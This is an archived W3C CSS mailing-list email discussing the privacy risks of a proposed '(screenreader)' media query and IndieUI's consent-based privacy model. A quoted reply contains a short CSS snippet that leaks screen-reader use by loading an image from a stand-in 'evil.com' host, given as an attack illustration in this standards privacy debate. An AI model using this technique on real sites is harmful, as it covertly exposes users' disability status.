- From: Florian Rivoal <florian@rivoal.net>
- Date: Wed, 3 Dec 2014 00:38:41 +0100
- To: James Craig <jcraig@apple.com>
- Cc: fantasai <fantasai.lists@inkedblade.net>, Alan Stearns <stearns@adobe.com>, www-style list <www-style@w3.org>, "Tab Atkins Jr." <jackalmage@gmail.com>, fantasai <fantasai@inkedblade.net>
> On 02 Dec 2014, at 22:58, James Craig <jcraig@apple.com> wrote:
> 
> 
>> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
>> 
>>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy and personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
>> 
>> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors from doing this:
>> 
>> <style>
>> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
>> </style>
>> <div id="snoop"></div>
> 
> That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.
Aha, sorry, I had misunderstood the model, and thought that this cloaking applied only to the js apis (window.matchMedia & window.userSetting), but that the CSS would apply regardless.
I was hoping (without seeing how it would be possible) you’d have a model which allows something to be applied while pretending it’s not, similar to the trick on :visited, but better.
Now I see how the model makes sense. Users can’t both have the media query apply and hide its usage at the same time, but they get to pick which one it is. I guess that’s reasonable. I am up for including this in the MQ spec, and will bring it up to the WG. Is the indie-UI spec expected to become a good stable reference for the definition of the privacy model? I’d rather not need to inline that part into MQs if we can avoid it.
This raises 2 (related) questions. Is the introduction of this media feature sufficient to deprecate the “speech” media type into never matching? If not, can and should the same privacy model be applied to it?
 - Florian
Received on Tuesday, 2 December 2014 23:39:08 UTC